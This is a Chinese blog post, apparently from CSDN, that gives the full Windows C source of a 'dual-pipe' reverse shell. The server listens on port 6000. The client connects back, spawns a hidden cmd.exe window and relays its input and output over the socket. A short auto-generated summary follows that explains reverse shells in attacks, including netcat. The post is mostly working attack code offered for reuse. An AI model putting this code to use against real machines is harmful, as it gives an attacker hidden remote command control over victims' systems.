双管道cmd反弹程序

仅此记录,以备查询

server:


#include <WINSOCK2.H>
#include <windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")


void ReceiveThread(LPVOID lPvoid)
{
	SOCKET socketNew = (SOCKET)lPvoid;
	while(1)
	{
		char receiveBuf[1024];//接收
		int len = recv(socketNew,receiveBuf,sizeof(receiveBuf),0);
		if(len <= 0)
		{
			closesocket(socketNew);
			printf("socket error...\n");
			ExitThread(0);
		}
		receiveBuf[len] = 0;
		printf("%s",receiveBuf);
	}
}

void SendThread(LPVOID lPvoid)
{
	SOCKET socketNew = (SOCKET)lPvoid;

	char test[] = "dir d:\\";
	char sendBuf[1024];
	
	while(1)
	{
		gets(sendBuf);        
		//printf("Send:%s\n",sendBuf);
		if(SOCKET_ERROR == send(socketNew,sendBuf,strlen(sendBuf),0))
		{
			printf("Send Error\n");
			//第一个套接字关闭后,还未退出该线程,所以输入 ,没有任何效果
			//当然这里仅是测试,正常不会不同连接应该对应不同的cmd窗口
			ExitThread(0);
		}
	}

}


void SocketThread(LPVOID lPvoid)
{
	SOCKET socketNew = (SOCKET)lPvoid;
	_beginthread(ReceiveThread, NULL, (LPVOID)socketNew);
	_beginthread(SendThread, NULL, (LPVOID)socketNew);

}

int main(int argc,char **argv)
{
	//创建套接字
	WORD myVersionRequest;
	WSADATA wsaData;
	myVersionRequest=MAKEWORD(2,2);
	int err;
	err=WSAStartup(myVersionRequest,&wsaData);
	if (!err){
		printf("已打开套接字\n");
	}else{
		printf("ERROR:嵌套字未打开!");
		return 1;
	}
	//进一步绑定套接字
	SOCKET serSocket=socket(AF_INET,SOCK_STREAM,0);//创建了可识别套接字

	//需要绑定的参数
	SOCKADDR_IN addr;
	addr.sin_family=AF_INET;
	addr.sin_addr.S_un.S_addr=htonl(INADDR_ANY);//ip地址
	addr.sin_port=htons(6000);//绑定端口

	bind(serSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR));//绑定完成
	listen(serSocket,5);//其中第二个参数代表能够接收的最多的连接数

	//
	//开始进行监听
	//
	SOCKADDR_IN clientsocket;
	int len=sizeof(SOCKADDR);

	while(1)
	{
		SOCKET socketNew = accept(serSocket,(SOCKADDR*)&clientsocket,&len);
		printf("new connection is coming....\n");
		_beginthread(SocketThread, NULL, (LPVOID)socketNew);
	}
	return 1;
}

client:

#include <WINSOCK2.H>
#include <Windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")

HANDLE hStdInRead, hStdInWrite;
HANDLE hStdOutRead, hStdOutWrite;

SECURITY_ATTRIBUTES saIn, saOut;

SOCKET clientSocket;



BOOL CreateTwoPipe()
{
	DWORD dwRet;
	saIn.nLength = sizeof(SECURITY_ATTRIBUTES);
	saIn.bInheritHandle = TRUE;
	saIn.lpSecurityDescriptor = NULL;
	dwRet = CreatePipe(&hStdInRead, &hStdInWrite, &saIn, 0);
	if(!dwRet)
	{
		printf("failed to create in pipe...\n");
		return FALSE;
	}

	saOut.nLength = sizeof(SECURITY_ATTRIBUTES);
	saOut.bInheritHandle = TRUE;
	saOut.lpSecurityDescriptor = NULL;
	dwRet = CreatePipe(&hStdOutRead, &hStdOutWrite, &saOut, 0);
	if(!dwRet)
	{
		printf("failed to create in pipe...\n");
		return FALSE;
	}

	STARTUPINFO si;
	ZeroMemory(&si, sizeof(si));
	si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.wShowWindow=SW_HIDE; 
	si.hStdInput = hStdInRead;
	si.hStdOutput = hStdOutWrite;
	si.hStdError = hStdOutWrite;
	char cmdline[]="cmd.exe";
	PROCESS_INFORMATION ProcessInformation; 
	dwRet = CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation); 

	return TRUE;

}

void ReadOutPutReadCmd(LPVOID lPvoid)
{
	DWORD dwByteRecv;
	char Buf[1024] = {0};
	int ret;

	while(1)
	{
		memset(Buf, 0, sizeof(Buf));
		PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);
		if(dwByteRecv)
		{
			ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);
			if(!ret)
				break;
			ret = send(clientSocket, Buf, dwByteRecv, 0);
			if(ret <= 0)
				break;
		}
	}

}


int main(int argc,char **argv)
{
	int err;
	WORD versionRequired;
	WSADATA wsaData;
	versionRequired=MAKEWORD(2,2);
	err=WSAStartup(versionRequired,&wsaData);//协议库的版本信息
	if (!err)    {
		printf("客户端嵌套字已经打开!\n");
	}else{
		printf("ERROR:客户端的嵌套字打开失败!\n");
		return 1;//结束
	}
	clientSocket=socket(AF_INET,SOCK_STREAM,0);

	SOCKADDR_IN clientsock_in;
	clientsock_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");
	clientsock_in.sin_family=AF_INET;
	clientsock_in.sin_port=htons(6000);

	//bind(clientSocket,(SOCKADDR*)&clientsock_in,strlen(SOCKADDR));//注意第三个参数
	//listen(clientSocket,5);
	int ret = connect(clientSocket,(SOCKADDR*)&clientsock_in,sizeof(SOCKADDR));//开始连接
	if(ret != 0)
	{
		printf("failed to connect to server...\n");
		return 0;
	}

	if(!CreateTwoPipe())
	{
		printf("failed to create pipe...\n");
		return 0;
	}

	DWORD dwByteRecv;
	char Buf[1024] = {0};

	_beginthread(ReadOutPutReadCmd, 0, NULL);

	while(1)
	{
		//memset(Buf, 0, sizeof(Buf));
		//Sleep(1000);   //等待cmd执行
		//PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);
		//if(dwByteRecv)
		//{
		//	ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);
		//	if(!ret)
		//		break;
		//	ret = send(clientSocket, Buf, dwByteRecv, 0);
		//	if(ret <= 0)
		//		break;
		//}
		//else
		//{
		//	dwByteRecv = recv(clientSocket, Buf, 1024, 0);

		//	if(dwByteRecv <= 0)
		//		break;	
		//	Buf[dwByteRecv] = '\r';
		//	Buf[dwByteRecv+1] = '\n';
		//	Buf[dwByteRecv + 2] = 0;
		//	printf("recv: %s", Buf);
		//	ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);
		//	if(!ret)
		//		break;

		//}

		dwByteRecv = recv(clientSocket, Buf, 1024, 0);

		if(dwByteRecv <= 0)
			break;	
		Buf[dwByteRecv] = '\r';
		Buf[dwByteRecv+1] = '\n';
		Buf[dwByteRecv + 2] = 0;
		printf("recv: %s", Buf);
		ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);
		if(!ret)
			break;
	}
	closesocket(clientSocket);
	WSACleanup();
	system("pause");
	return 0;
}


  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
反弹shell是指在渗透测试或网络攻击中,攻击者通过利用漏洞或恶意代码,将一个命令行shell连接到受攻击系统上。这样攻击者可以远程执行命令并控制受攻击系统。CMD反弹shell是使用CMD命令行工具实现的一种反弹shell的技术。 有几种常见的实现方式: 1. 使用netcat反弹shell: 攻击者可以在自己的机器上使用netcat工具监听一个指定端口,并将命令行的输入输出重定向到建立的连接上,然后利用漏洞或恶意代码使目标系统的CMD命令行连接到攻击者机器上。这样攻击者就能够在CMD命令行上执行命令并控制目标系统。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Windows下反弹shell的方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [反弹shell汇总(超详细)](https://blog.csdn.net/qq_52173020/article/details/125011441)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值